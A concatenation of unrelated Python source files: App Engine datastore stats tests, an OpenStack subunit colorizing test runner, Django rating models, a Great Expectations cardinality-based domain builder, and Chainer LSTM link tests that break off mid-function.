"""Test fetching the Kind root entity stats."""
res = stats.KindRootEntityStat.query().fetch()
self.assertEquals(2, len(res))
self.assertEquals('foo3', res[0].kind_name)
self.assertEquals('foo4', res[1].kind_name)
self.assertEquals(2, res[0].entity_bytes)
def testKindNonRootEntityStat(self):
"""Test fetching the Kind non-root entity stats."""
res = stats.KindNonRootEntityStat.query().fetch()
self.assertEquals(2, len(res))
self.assertEquals('foo5', res[0].kind_name)
self.assertEquals('foo6', res[1].kind_name)
self.assertEquals(2, res[0].entity_bytes)
def testPropertyTypeStat(self):
"""Test fetching the property type stats."""
res = stats.PropertyTypeStat.query().fetch()
self.assertEquals(2, len(res))
self.assertEquals('pt1', res[0].property_type)
self.assertEquals('pt2', res[1].property_type)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
def testKindPropertyTypeStat(self):
"""Test fetching the (kind, property type) stats."""
res = stats.KindPropertyTypeStat.query().fetch()
self.assertEquals(3, len(res))
self.assertEquals('foo1', res[0].kind_name)
self.assertEquals('pt1', res[0].property_type)
self.assertEquals('foo1', res[1].kind_name)
self.assertEquals('pt2', res[1].property_type)
self.assertEquals('foo2', res[2].kind_name)
self.assertEquals('pt2', res[2].property_type)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
query = stats.KindPropertyTypeStat.query(
stats.KindPropertyTypeStat.kind_name == 'foo2')
res = query.fetch()
self.assertEquals(1, len(res))
self.assertEquals('foo2', res[0].kind_name)
def testKindPropertyNameStat(self):
"""Test fetching the (kind, property name) type stats."""
res = stats.KindPropertyNameStat.query().fetch()
self.assertEquals(3, len(res))
self.assertEquals('foo11', res[0].kind_name)
self.assertEquals('pn1', res[0].property_name)
self.assertEquals('foo11', res[1].kind_name)
self.assertEquals('pn2', res[1].property_name)
self.assertEquals('foo21', res[2].kind_name)
self.assertEquals('pn2', res[2].property_name)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
query = stats.KindPropertyNameStat.query(
stats.KindPropertyNameStat.kind_name == 'foo21')
res = query.fetch()
self.assertEquals(1, len(res))
self.assertEquals('foo21', res[0].kind_name)
def testKindPropertyNamePropertyTypeStat(self):
"""Test fetching the (kind, property name, property type) stats."""
res = stats.KindPropertyNamePropertyTypeStat.query().fetch()
self.assertEquals(3, len(res))
self.assertEquals('foo12', res[0].kind_name)
self.assertEquals('pn1', res[0].property_name)
self.assertEquals('pt1', res[0].property_type)
self.assertEquals('foo12', res[1].kind_name)
self.assertEquals('pn2', res[1].property_name)
self.assertEquals('pt2', res[1].property_type)
self.assertEquals('foo22', res[2].kind_name)
self.assertEquals('pn2', res[2].property_name)
self.assertEquals('pt2', res[2].property_type)
self.assertEquals(2, res[0].entity_bytes)
self.assertEquals(3, res[0].builtin_index_count)
self.assertEquals(1, res[0].builtin_index_bytes)
query = stats.KindPropertyNamePropertyTypeStat.query(
stats.KindPropertyNamePropertyTypeStat.kind_name == 'foo22')
res = query.fetch()
self.assertEquals(1, len(res))
self.assertEquals('foo22', res[0].kind_name)
def testKindCompositeIndex(self):
"""Test fetching the (kind, composite index id) stats."""
res = stats.KindCompositeIndexStat.query().fetch()
self.assertEquals(3, len(res))
self.assertEquals('foo12', res[0].kind_name)
self.assertEquals(1, res[0].index_id)
self.assertEquals('foo12', res[1].kind_name)
self.assertEquals(2, res[1].index_id)
self.assertEquals('foo22', res[2].kind_name)
self.assertEquals(3, res[2].index_id)
self.assertEquals(4, res[0].bytes)
self.assertEquals(2, res[0].count)
if __name__ == '__main__':
unittest.main()
| |
#!/usr/bin/env python
# Based on: https://github.com/openstack/tempest/blob/master/tools/colorizer.py
# ------------------------------------------------------------------------
# Copyright (c) 2013, Nebula, Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Colorizer Code is borrowed from Twisted:
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Display a subunit stream through a colorized unittest test runner.
Modified a bit from the original version to fit pep8 and hacking rules.
"""
import heapq
import sys
import unittest
import subunit
import testtools
class _AnsiColorizer(object):
"""Presents colorizer object.
A colorizer is an object that loosely wraps around a stream, allowing
callers to write text to the stream in a particular color.
Colorizer classes must implement C{supported()} and C{write(text, color)}.
"""
_colors = dict(black=30, red=31, green=32, yellow=33,
blue=34, magenta=35, cyan=36, white=37)
def __init__(self, stream):
self.stream = stream
def supported(cls, stream=sys.stdout):
"""Returns if current platform supports coloring terminal output."""
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
except ImportError:
return False
else:
try:
try:
return curses.tigetnum("colors") > 2
except curses.error:
curses.setupterm()
return curses.tigetnum("colors") > 2
except Exception:
# guess false in case of error
return False
supported = classmethod(supported)
def write(self, text, color):
"""Write the given text to the stream in the given color.
:param text: Text to be written to the stream.
:param color: A string label for a color. e.g. 'red', 'white'.
"""
color = self._colors[color]
self.stream.write('\x1b[%s;1m%s\x1b[0m' % (color, text))
class _Win32Colorizer(object):
"""See _AnsiColorizer docstring."""
def __init__(self, stream):
import win32console
red, green, blue, bold = (win32console.FOREGROUND_RED,
win32console.FOREGROUND_GREEN,
win32console.FOREGROUND_BLUE,
win32console.FOREGROUND_INTENSITY)
self.stream = stream
self.screenBuffer = win32console.GetStdHandle(
win32console.STD_OUT_HANDLE)
self._colors = {'normal': red | green | blue,
'red': red | bold,
'green': green | bold,
'blue': blue | bold,
'yellow': red | green | bold,
'magenta': red | blue | bold,
'cyan': green | blue | bold,
'white': red | green | blue | bold}
def supported(cls, stream=sys.stdout):
try:
import win32console
screenBuffer = win32console.GetStdHandle(
win32console.STD_OUT_HANDLE)
except ImportError:
return False
import pywintypes
try:
screenBuffer.SetConsoleTextAttribute(
win32console.FOREGROUND_RED |
win32console.FOREGROUND_GREEN |
win32console.FOREGROUND_BLUE)
except pywintypes.error:
return False
else:
return True
supported = classmethod(supported)
def write(self, text, color):
color = self._colors[color]
self.screenBuffer.SetConsoleTextAttribute(color)
self.stream.write(text)
self.screenBuffer.SetConsoleTextAttribute(self._colors['normal'])
class _NullColorizer(object):
"""See _AnsiColorizer docstring."""
def __init__(self, stream):
self.stream = stream
def supported(cls, stream=sys.stdout):
return True
supported = classmethod(supported)
def write(self, text, color):
self.stream.write(text)
def get_elapsed_time_color(elapsed_time):
# if elapsed_time > 60.0:
# return 'red'
# elif elapsed_time > 10.0:
# return 'yellow'
# else:
return 'green'
def get_shouldfail_info(details):
if details:
content = details.get('shouldfail-info')
if content:
return content.as_text().strip()
return ''
def split_test_id(test_id):
test_id_split = test_id.rsplit('.', 1)
if len(test_id_split) > 1:
test_class, test_name = test_id_split
else:
test_class = ''
test_name = test_id
return test_class, test_name
class NovaTestResult(testtools.TestResult):
def __init__(self, stream, descriptions, verbosity):
super(NovaTestResult, self).__init__()
self.stream = stream
self.showAll = verbosity > 1
self.num_slow_tests = 10
self.slow_tests = [] # this is a fixed-sized heap
self.colorizer = None
# NOTE(vish): reset stdout for the terminal check
stdout = sys.stdout
sys.stdout = sys.__stdout__
for colorizer in [_Win32Colorizer, _AnsiColorizer, _NullColorizer]:
if colorizer.supported():
self.colorizer = colorizer(self.stream)
break
sys.stdout = stdout
self.start_time = None
self.last_time = {}
self.results = {}
self.last_written = None
self.own_expected_failures = []
self.own_unexpected_successes = []
def _writeElapsedTime(self, elapsed):
color = get_elapsed_time_color(elapsed)
self.colorizer.write(" %.2f" % elapsed, color)
def _addResult(self, test, *args):
try:
name = test.id()
except AttributeError:
name = 'Unknown.unknown'
test_class, test_name = split_test_id(name)
elapsed = (self._now() - self.start_time).total_seconds()
item = (elapsed, test_class, test_name)
if len(self.slow_tests) >= self.num_slow_tests:
heapq.heappushpop(self.slow_tests, item)
else:
heapq.heappush(self.slow_tests, item)
self.results.setdefault(test_class, [])
self.results[test_class].append((test_name, elapsed) + args)
self.last_time[test_class] = self._now()
self.writeTests()
def _writeResult(self, test_name, elapsed, long_result, color,
short_result, success):
if self.showAll:
self.stream.write(' %s' % str(test_name).ljust(68))
self.colorizer.write(long_result, color)
if success:
self._writeElapsedTime(elapsed)
self.stream.writeln()
else:
self.colorizer.write(short_result, color)
def addSuccess(self, test):
super(NovaTestResult, self).addSuccess(test)
self._addResult(test, 'OK', 'green', '.', True)
def addUnexpectedSuccess(self, test, details=None):
super(NovaTestResult, self).addUnexpectedSuccess(test, details)
self._addResult(test, 'UX-OK', 'red', 'X', True)
self.own_unexpected_successes.append(
(test, get_shouldfail_info(details)))
def addFailure(self, test, err):
if test.id() == 'process-returncode':
return
super(NovaTestResult, self).addFailure(test, err)
self._addResult(test, 'FAIL', 'red', 'F', False)
def addExpectedFailure(self, test, err=None, details=None):
super(NovaTestResult, self).addExpectedFailure(test, err, details)
self._addResult(test, 'X-FAIL', 'green', '*', True)
self.own_expected_failures.append(
(test, get_shouldfail_info(details)))
def addError(self, test, err):
super(NovaTestResult, self).addFailure(test, err)
self._addResult(test, 'ERROR', 'red', 'E', False)
def addSkip(self, test, reason=None, details=None):
super(NovaTestResult, self).addSkip(test, reason, details)
self._addResult(test, 'SKIP', 'cyan', 'S', False)
def startTest(self, test):
self.start_time = self._now()
super(NovaTestResult, self).startTest(test)
def writeTestCase(self, cls):
if not self.results.get(cls):
return
if cls != self.last_written:
self.colorizer.write(cls, 'blue')
self.stream.writeln()
for result in self.results[cls]:
self._writeResult(*result)
del self.results[cls]
self.stream.flush()
self.last_written = cls
def writeTests(self):
time = self.last_time.get(self.last_written, self._now())
if not self.last_written or (self._now() - time).total_seconds() > 2.0:
diff = 3.0
while diff > 2.0:
classes = self.results.keys()
oldest = min(classes, key=lambda x: self.last_time[x])
diff = (self._now() - self.last_time[oldest]).total_seconds()
self.writeTestCase(oldest)
else:
self.writeTestCase(self.last_written)
def done(self):
self.stopTestRun()
def stopTestRun(self):
for cls in list(self.results.iterkeys()):
self.writeTestCase(cls)
self.stream.writeln()
self.writeSlowTests()
def writeSlowTests(self):
# Pare out 'fast' tests
slow_tests = [item for item in self.slow_tests
if get_elapsed_time_color(item[0]) != 'green']
if slow_tests:
slow_total_time = sum(item[0] for item in slow_tests)
slow = ("Slowest %i tests took %.2f secs:"
% (len(slow_tests), slow_total_time))
self.colorizer.write(slow, 'yellow')
self.stream.writeln()
last_cls = None
# sort by name
for elapsed, cls, name in sorted(slow_tests,
key=lambda x: x[1] + x[2]):
if cls != last_cls:
self.colorizer.write(cls, 'blue')
self.stream.writeln()
last_cls = cls
self.stream.write(' %s' % str(name).ljust(68))
self._writeElapsedTime(elapsed)
self.stream.writeln()
def printErrors(self):
if self.showAll:
self.stream.writeln()
self.printErrorList('EXPECTED FAILURES',
self.own_expected_failures, 'green')
self.printErrorList('UNEXPECTED SUCCESSES',
self.own_unexpected_successes, 'magenta')
self.printErrorList('ERRORS', self.errors, 'red')
self.printErrorList('FAILURES', self.failures, 'red')
def printErrorList(self, flavor, errors, color):
if not errors:
return
self.colorizer.write("=" * 80, color)
self.stream.writeln()
self.colorizer.write(flavor + ":", color)
self.stream.writeln()
self.colorizer.write("-" * 80, color)
self.stream.writeln()
for test, err in errors:
self.colorizer.write(test.id(), color)
self.stream.writeln()
if err:
self.stream.writeln("%s" % err)
self.stream.writeln()
test = subunit.ProtocolTestCase(sys.stdin, passthrough=None)
if sys.version_info[0:2] <= (2, 6):
runner = unittest.TextTestRunner(verbosity=2)
else:
runner = unittest.TextTestRunner(verbosity=2, resultclass=NovaTestResult)
if runner.run(test).wasSuccessful():
exit_code = 0
else:
exit_code = 1
sys.exit(exit_code)
| |
import hashlib
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.query import QuerySet
from generic_aggregation import generic_annotate
from .utils import is_gfk, recommended_items
class RatedItemBase(models.Model):
score = models.FloatField(default=0, db_index=True)
user = models.ForeignKey(User, related_name='%(class)ss', on_delete=models.CASCADE)
hashed = models.CharField(max_length=40, editable=False, db_index=True)
class Meta:
abstract = True
def __str__(self):
return "%s rated %s by %s" % (self.content_object, self.score, self.user)
def save(self, *args, **kwargs):
self.hashed = self.generate_hash()
super(RatedItemBase, self).save(*args, **kwargs)
def generate_hash(self):
content_field = self._meta.get_field('content_object')
related_object = getattr(self, content_field.name)
uniq = '%s.%s' % (related_object._meta, related_object.pk)
return hashlib.sha1(uniq.encode('ascii')).hexdigest()
@classmethod
def lookup_kwargs(cls, instance):
return {'content_object': instance}
@classmethod
def base_kwargs(cls, model_class):
return {}
class RatedItem(RatedItemBase):
object_id = models.IntegerField()
content_type = models.ForeignKey(
ContentType,
related_name='rated_items',
on_delete=models.CASCADE,
)
content_object = GenericForeignKey()
@classmethod
def lookup_kwargs(cls, instance):
return {
'object_id': instance.pk,
'content_type': ContentType.objects.get_for_model(instance)
}
@classmethod
def base_kwargs(cls, model_class):
return {'content_type': ContentType.objects.get_for_model(model_class)}
# this goes on your model
class Ratings(object):
def __init__(self, rating_model=None):
self.rating_model = rating_model or RatedItem
def contribute_to_class(self, cls, name):
# set up the ForeignRelatedObjectsDescriptor right hyah
setattr(cls, name, _RatingsDescriptor(cls, self.rating_model, name))
setattr(cls, '_ratings_field', name)
class RatingsQuerySet(QuerySet):
def __init__(self, model=None, query=None, using=None, hints=None, rated_model=None):
self.rated_model = rated_model
super(RatingsQuerySet, self).__init__(model, query, using, hints)
def _clone(self, *args, **kwargs):
instance = super(RatingsQuerySet, self)._clone(*args, **kwargs)
instance.rated_model = self.rated_model
return instance
def order_by_rating(self, aggregator=models.Sum, descending=True,
queryset=None, alias='score'):
related_field = self.model._meta.get_field('content_object')
if queryset is None:
queryset = self.rated_model._default_manager.all()
ordering = descending and '-%s' % alias or alias
if not is_gfk(related_field):
query_name = related_field.related_query_name()
if len(self.query.where.children):
queryset = queryset.filter(**{
'%s__pk__in' % query_name: self.values_list('pk')
})
return queryset.annotate(**{
alias: aggregator('%s__score' % query_name)
}).order_by(ordering)
else:
return generic_annotate(
queryset,
self,
aggregator('score'),
related_field,
alias=alias
).order_by(ordering)
class _RatingsDescriptor(models.Manager):
def __init__(self, rated_model, rating_model, rating_field):
self.rated_model = rated_model
self.rating_model = rating_model
self.rating_field = rating_field
def __get__(self, instance, instance_type=None):
if instance is None:
return self
return self.create_manager(instance, self.rating_model._default_manager.__class__)
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
manager = self.__get__(instance)
manager.add(*value)
def get_queryset(self):
base_filters = self.rating_model.base_kwargs(self.rated_model)
qs = RatingsQuerySet(self.rating_model, rated_model=self.rated_model)
return qs.filter(**base_filters)
def delete_manager(self, instance):
"""
Returns a queryset based on the related model's base manager (rather
than the default manager, as returned by __get__). Used by
Model.delete().
"""
return self.create_manager(instance,
self.rating_model._base_manager.__class__)
def create_manager(self, instance, superclass):
"""
Dynamically create a RelatedManager to handle the back side of the (G)FK
"""
rel_model = self.rating_model
rated_model = self.rated_model
class RelatedManager(superclass):
def get_queryset(self):
qs = RatingsQuerySet(rel_model, rated_model=rated_model)
return qs.filter(**(self.core_filters))
def add(self, *objs):
lookup_kwargs = rel_model.lookup_kwargs(instance)
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
for (k, v) in lookup_kwargs.items():
setattr(obj, k, v)
obj.save()
add.alters_data = True
def create(self, **kwargs):
kwargs.update(rel_model.lookup_kwargs(instance))
return super(RelatedManager, self).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs.update(rel_model.lookup_kwargs(instance))
return super(RelatedManager, self).get_or_create(**kwargs)
get_or_create.alters_data = True
def remove(self, *objs):
for obj in objs:
# Is obj actually part of this descriptor set?
if obj in self.all():
obj.delete()
else:
raise rel_model.DoesNotExist(
"%r is not related to %r." % (obj, instance))
remove.alters_data = True
def clear(self):
self.all().delete()
clear.alters_data = True
def rate(self, user, score):
rating, created = self.get_or_create(user=user)
if created or score != rating.score:
rating.score = score
rating.save()
return rating
def unrate(self, user):
return self.filter(user=user, **rel_model.lookup_kwargs(instance)).delete()
def perform_aggregation(self, aggregator):
score = self.all().aggregate(agg=aggregator('score'))
return score['agg']
def cumulative_score(self):
# simply the sum of all scores, useful for +1/-1
return self.perform_aggregation(models.Sum)
def average_score(self):
# the average of all the scores, useful for 1-5
return self.perform_aggregation(models.Avg)
def standard_deviation(self):
# the standard deviation of all the scores, useful for 1-5
return self.perform_aggregation(models.StdDev)
def variance(self):
# the variance of all the scores, useful for 1-5
return self.perform_aggregation(models.Variance)
def similar_items(self):
return SimilarItem.objects.get_for_item(instance)
manager = RelatedManager()
manager.core_filters = rel_model.lookup_kwargs(instance)
manager.model = rel_model
return manager
def update_similar_items(self):
from ratings.utils import calculate_similar_items
calculate_similar_items(self.all())
def similar_items(self, item):
return SimilarItem.objects.get_for_item(item)
def recommended_items(self, user):
return recommended_items(self.all(), user)
def order_by_rating(self, aggregator=models.Sum, descending=True,
queryset=None, alias='score'):
return self.all().order_by_rating(
aggregator, descending, queryset, alias
)
class SimilarItemManager(models.Manager):
def get_for_item(self, instance):
ctype = ContentType.objects.get_for_model(instance)
qs = self.filter(content_type=ctype, object_id=instance.pk)
return qs.order_by('-score')
class SimilarItem(models.Model):
content_type = models.ForeignKey(
ContentType,
related_name='similar_items',
on_delete=models.CASCADE,
)
object_id = models.IntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
similar_content_type = models.ForeignKey(
ContentType,
related_name='similar_items_set',
on_delete=models.CASCADE,
)
similar_object_id = models.IntegerField()
similar_object = GenericForeignKey('similar_content_type', 'similar_object_id')
score = models.FloatField(default=0)
objects = SimilarItemManager()
def __str__(self):
return '%s (%s)' % (self.similar_object, self.score)
| |
from typing import Any, Dict, List, Optional, Set, Tuple, Union
from great_expectations.core.batch import Batch, BatchRequest, RuntimeBatchRequest
from great_expectations.execution_engine.execution_engine import MetricDomainTypes
from great_expectations.rule_based_profiler.domain_builder import ColumnDomainBuilder
from great_expectations.rule_based_profiler.helpers.cardinality_checker import (
AbsoluteCardinalityLimit,
CardinalityChecker,
CardinalityLimitMode,
RelativeCardinalityLimit,
)
from great_expectations.rule_based_profiler.helpers.util import (
build_simple_domains_from_column_names,
get_resolved_metrics_by_key,
)
from great_expectations.rule_based_profiler.types import Domain, ParameterContainer
from great_expectations.validator.metric_configuration import MetricConfiguration
class CategoricalColumnDomainBuilder(ColumnDomainBuilder):
"""
This DomainBuilder uses column cardinality to identify domains.
"""
exclude_field_names: Set[str] = ColumnDomainBuilder.exclude_field_names | {
"cardinality_checker",
}
def __init__(
self,
batch_list: Optional[List[Batch]] = None,
batch_request: Optional[Union[BatchRequest, RuntimeBatchRequest, dict]] = None,
data_context: Optional["DataContext"] = None, # noqa: F821
limit_mode: Optional[Union[CardinalityLimitMode, str]] = None,
max_unique_values: Optional[int] = None,
max_proportion_unique: Optional[int] = None,
exclude_columns: Optional[Union[str, Optional[List[str]]]] = None,
):
"""Create column domains where cardinality is within the specified limit.
Cardinality refers to the number of unique values in a given domain.
Categorical generally refers to columns with relatively limited
number of unique values.
Limit mode can be absolute (number of unique values) or relative
(proportion of unique values). You can choose one of: limit_mode,
max_unique_values or max_proportion_unique to specify the cardinality
limit.
Note that the limit must be met for each batch separately that is
supplied in the batch_request or the column domain will not be included.
Note that the columns used will be from the first batch retrieved
via the batch_request. If other batches contain additional columns,
these will not be considered.
Args:
batch_list: explicitly specified Batch objects for use in DomainBuilder
batch_request: BatchRequest to be optionally used to define batches to consider for this domain builder.
data_context: DataContext associated with this profiler.
limit_mode: CardinalityLimitMode or string name of the mode
defining the maximum allowable cardinality to use when
filtering columns.
max_unique_values: number of max unique rows for a custom
cardinality limit to use when filtering columns.
max_proportion_unique: proportion of unique values for a
custom cardinality limit to use when filtering columns.
exclude_columns: If provided, these columns are pre-filtered and
excluded from consideration, cardinality is not computed.
"""
super().__init__(
batch_list=batch_list,
batch_request=batch_request,
data_context=data_context,
column_names=None,
)
self._cardinality_checker = CardinalityChecker(
limit_mode=limit_mode,
max_unique_values=max_unique_values,
max_proportion_unique=max_proportion_unique,
)
self._exclude_columns = exclude_columns
@property
def domain_type(self) -> Union[str, MetricDomainTypes]:
return MetricDomainTypes.COLUMN
@property
def cardinality_checker(self) -> CardinalityChecker:
return self._cardinality_checker
@property
def exclude_columns(self) -> List[str]:
return self._exclude_columns
def _get_domains(
self,
variables: Optional[ParameterContainer] = None,
) -> List[Domain]:
"""Return domains matching the selected limit_mode.
Args:
variables: Optional variables to substitute when evaluating.
Returns:
List of domains that match the desired cardinality.
"""
table_column_names: List[str] = self.get_effective_column_names(
include_columns=None,
exclude_columns=self.exclude_columns,
variables=variables,
)
batch_ids: List[str] = self.get_batch_ids(variables=variables)
metrics_for_cardinality_check: Dict[
str, List[MetricConfiguration]
] = self._generate_metric_configurations_to_check_cardinality(
batch_ids=batch_ids, column_names=table_column_names
)
validator: "Validator" = self.get_validator(variables=variables) # noqa: F821
candidate_column_names: List[
str
] = self._column_names_meeting_cardinality_limit(
validator=validator,
metrics_for_cardinality_check=metrics_for_cardinality_check,
)
return build_simple_domains_from_column_names(
column_names=candidate_column_names,
domain_type=self.domain_type,
)
def _generate_metric_configurations_to_check_cardinality(
self,
batch_ids: List[str],
column_names: List[str],
) -> Dict[str, List[MetricConfiguration]]:
"""Generate metric configurations used to compute metrics for checking cardinality.
Args:
batch_ids: List of batch_ids used to create metric configurations.
column_names: List of column_names used to create metric configurations.
Returns:
Dictionary of the form {
"my_column_name": List[MetricConfiguration],
}
"""
limit_mode: Union[
AbsoluteCardinalityLimit, RelativeCardinalityLimit
] = self.cardinality_checker.limit_mode
column_name: str
batch_id: str
metric_configurations: Dict[str, List[MetricConfiguration]] = {
column_name: [
MetricConfiguration(
metric_name=limit_mode.metric_name_defining_limit,
metric_domain_kwargs={
"column": column_name,
"batch_id": batch_id,
},
metric_value_kwargs=None,
metric_dependencies=None,
)
for batch_id in batch_ids
]
for column_name in column_names
}
return metric_configurations
def _column_names_meeting_cardinality_limit(
self,
validator: "Validator", # noqa: F821
metrics_for_cardinality_check: Dict[str, List[MetricConfiguration]],
) -> List[str]:
"""Compute cardinality and return column names meeting cardinality limit.
Args:
validator: Validator used to compute column cardinality.
metrics_for_cardinality_check: metric configurations used to compute cardinality.
Returns:
List of column names meeting cardinality.
"""
column_name: str
resolved_metrics: Dict[Tuple[str, str, str], Any]
metric_value: Any
resolved_metrics_by_column_name: Dict[
str, Dict[Tuple[str, str, str], Any]
] = get_resolved_metrics_by_key(
validator=validator,
metric_configurations_by_key=metrics_for_cardinality_check,
)
candidate_column_names: List[str] = [
column_name
for column_name, resolved_metrics in resolved_metrics_by_column_name.items()
if all(
[
self.cardinality_checker.cardinality_within_limit(
metric_value=metric_value
)
for metric_value in list(resolved_metrics.values())
]
)
]
return candidate_column_names
| |
import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import links
from chainer import testing
from chainer.testing import attr
@testing.parameterize(
{'in_size': 10, 'out_size': 10},
{'in_size': 10, 'out_size': 40},
)
class TestLSTM(unittest.TestCase):
def setUp(self):
self.link = links.LSTM(self.in_size, self.out_size)
upward = self.link.upward.W.data
upward[...] = numpy.random.uniform(-1, 1, upward.shape)
lateral = self.link.lateral.W.data
lateral[...] = numpy.random.uniform(-1, 1, lateral.shape)
self.link.zerograds()
self.upward = upward.copy() # fixed on CPU
self.lateral = lateral.copy() # fixed on CPU
x_shape = (4, self.in_size)
self.x = numpy.random.uniform(-1, 1, x_shape).astype(numpy.float32)
def check_forward(self, x_data):
xp = self.link.xp
x = chainer.Variable(x_data)
h1 = self.link(x)
c0 = chainer.Variable(xp.zeros((len(self.x), self.out_size),
dtype=self.x.dtype))
c1_expect, h1_expect = functions.lstm(c0, self.link.upward(x))
testing.assert_allclose(h1.data, h1_expect.data)
testing.assert_allclose(self.link.h.data, h1_expect.data)
testing.assert_allclose(self.link.c.data, c1_expect.data)
h2 = self.link(x)
c2_expect, h2_expect = \
functions.lstm(c1_expect,
self.link.upward(x) + self.link.lateral(h1))
testing.assert_allclose(h2.data, h2_expect.data)
def test_forward_cpu(self):
self.check_forward(self.x)
@attr.gpu
def test_forward_gpu(self):
self.link.to_gpu()
self.check_forward(cuda.to_gpu(self.x))
class TestLSTMState(unittest.TestCase):
def setUp(self):
self.link = links.LSTM(5, 7)
self.x = chainer.Variable(
numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
self.c = chainer.Variable(
numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
self.h = chainer.Variable(
numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
def check_state(self):
self.assertIsNone(self.link.c)
self.assertIsNone(self.link.h)
self.link(self.x)
self.assertIsNotNone(self.link.c)
self.assertIsNotNone(self.link.h)
def test_state_cpu(self):
self.check_state()
@attr.gpu
def test_state_gpu(self):
self.link.to_gpu()
self.x.to_gpu()
self.check_state()
def check_set_state(self, c, h):
self.link.set_state(c, h)
self.assertIsInstance(self.link.c.data, self.link.xp.ndarray)
testing.assert_allclose(c.data, self.link.c.data)
self.assertIsInstance(self.link.h.data, self.link.xp.ndarray)
testing.assert_allclose(h.data, self.link.h.data)
def test_set_state_cpu(self):
self.check_set_state(self.c, self.h)
@attr.gpu
def test_set_state_gpu(self):
self.link.to_gpu()
self.check_set_state(self.c, self.h)
def check_reset_state(self):
self.link(self.x)
self.link.reset_state()
self.assertIsNone(self.link.c)
self.assertIsNone(self.link.h)
def test_reset_state_cpu(self):
self.check_reset_state()
@attr.gpu
def test_reset_state_gpu(self):
self.link.to_gpu()
self.x.to_gpu()
self.check_reset_state()
class TestLSTMToCPUToGPU(unittest.TestCase):
def setUp(self):
self.link = links.LSTM(5, 7)
self.x = chainer.Variable(
numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
def check_to_cpu(self, s):
self.link.to_cpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
self.link.to_cpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
def test_to_cpu_cpu(self):
self.link(self.x)
self.check_to_cpu(self.link.c)
self.check_to_cpu(self.link.h)
@attr.gpu
def test_to_cpu_gpu(self):
self.link.to_gpu()
self.x.to_gpu()
self.link(self.x)
self.check_to_cpu(self.link.c)
self.check_to_cpu(self.link.h)
def check_to_cpu_to_gpu(self, s):
self.link.to_gpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
self.link.to_gpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
self.link.to_cpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
self.link.to_gpu()
self.assertIsInstance(s.data, self.link.xp.ndarray)
@attr.gpu
def test_to_cpu_to_gpu_cpu(self):
self.link(self.x)
self.check_to_cpu_to_gpu(self.link.c)
self.check_to_cpu_to_gpu(self.link.h)
@attr.gpu
def test_to_cpu_to_gpu_gpu(self):
self.link.to_gpu()
self.x.to_gpu()
self.link(self.x)
self.check_to_cpu_to_gpu(self.link.c)
self.check_to_cpu_to_gpu(self.link.h)
@testing.parameterize(
{'in_size': 10, 'out_size': 10},
{'in_size': 10, 'out_size': 40},
)
class TestStatelessLSTM(unittest.TestCase):
def setUp(self):
self.link = links.StatelessLSTM(self.in_size, self.out_size)
upward = self.link.upward.W.data
upward[...] = numpy.random.uniform(-1, 1, upward.shape)
lateral = self.link.lateral.W.data
lateral[...] = numpy.random.uniform(-1, 1, lateral.shape)
self.link.zerograds()
self.upward = upward.copy() # fixed on CPU
self.lateral = lateral.copy() # fixed on CPU
x_shape = (4, self.in_size)
self.x = numpy.random.uniform(-1, 1, x_shape).astype(numpy.float32)
def check_forward(self, x_data):
xp = self.link.xp
x = chainer.Variable(x_data)
c1, h1 = self.link(None, None, x)
c0 = chainer.Variable(xp.zeros((len(self.x), self.out_size),
dtype=self.x.dtype))
c1_expect, h1_expect = functions.lstm(c0, self.link.upward(x))
testing.assert_allclose(h1.data, h1_expect.data)
testing.assert_allclose(c1.data, c1_expect.data)
c2, h2 = self.link(c1, h1, x)
c2_expect, h2_expect = \
functions.lstm(c1_expect,
self.link.upward(x) + self.link.lateral(h1))
